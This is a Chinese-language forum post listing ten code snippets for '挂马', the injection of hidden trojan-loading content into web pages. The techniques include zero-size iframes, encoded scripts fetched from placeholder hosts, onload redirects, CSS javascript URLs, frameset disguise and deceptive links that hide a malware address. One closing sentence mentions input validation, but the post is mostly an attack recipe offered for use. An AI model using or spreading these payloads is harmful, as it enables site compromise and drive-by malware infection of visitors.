找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1034|回复: 0

挂马的一些小代码

[复制链接]
已绑定手机

200

主题

162

回帖

701

牛毛

一级牛人

武汉市双益伞业有限公司

积分
701
发表于 2014-5-16 15:34:15 | 显示全部楼层 |阅读模式 来自 湖北省武汉市
一:框架挂马

  <iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
  
  首先将以下代码
  document.write(\"<iframe width=&#39;0&#39; height=&#39;0&#39; src=&#39;地址&#39;></iframe>\");
  保存为xxx.js,
  则JS挂马代码为
  <script language=javascript src=xxx.js></script>

三:js变形加密
  
  <SCRIPT language=\"JScript.Encode\" src=http://www.xxx.com/muma.txt></script>
  muma.txt可改成任意后缀

四:body挂马

<body onload=\"window.location=&#39;地址&#39;;\"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML +  &#39;<iframe src=\"http://www.xxx.com/muma.htm/\"></iframe>&#39;;

六:css中挂马

body {
  background-image: url(&#39;javascript:document.write(\"<script     src=http://www.XXX.net/muma.js></script>\")&#39;)}

七:JAJA挂马

<SCRIPT language=javascript>   
window.open (\"地址\",\"\",\"toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1\");
</script>

八:图片伪装

<html>
<iframe src=\"网马地址\" height=0 width=0></iframe>
<img src=\"图片地址\"></center>
</html>

九:伪装调用:

  <frameset rows=\"444,0\" cols=\"*\">
  <frame src=\"打开网页\" framborder=\"no\" scrolling=\"auto\" noresize  marginwidth=\"0\"margingheight=\"0\">
  <frame src=\"网马地址\" frameborder=\"no\" scrolling=\"no\"  noresize  marginwidth=\"0\"margingheight=\"0\">
  </frameset>

十:高级欺骗

<a href=\"http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)\" onMouseOver=\"www_163_com(); return true;\"> 页面要显示的

内容 </a>
<SCRIPT Language=\"JavaScript\">
function www_163_com ()
{
var url=\"网马地址\";
open

(url,\"NewWindow\",\"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width

=800,height=600,left=10,top=10\");
}
</SCRIPT>


实际上,挂木马的基本方法就是利用脚本程序发帖和提交信息的过滤不严格,使得我们可以将一些HTML或者脚本代码段作为文本提交,但是能被脚本解析.

从这个思想出发,可以利用正则表达的方法构造出更加巧妙的挂马方法.防止这种攻击的方法就是对所有的用户提交的数据在发布前必须经过类型检验.
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 22:47 , Processed in 0.128471 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表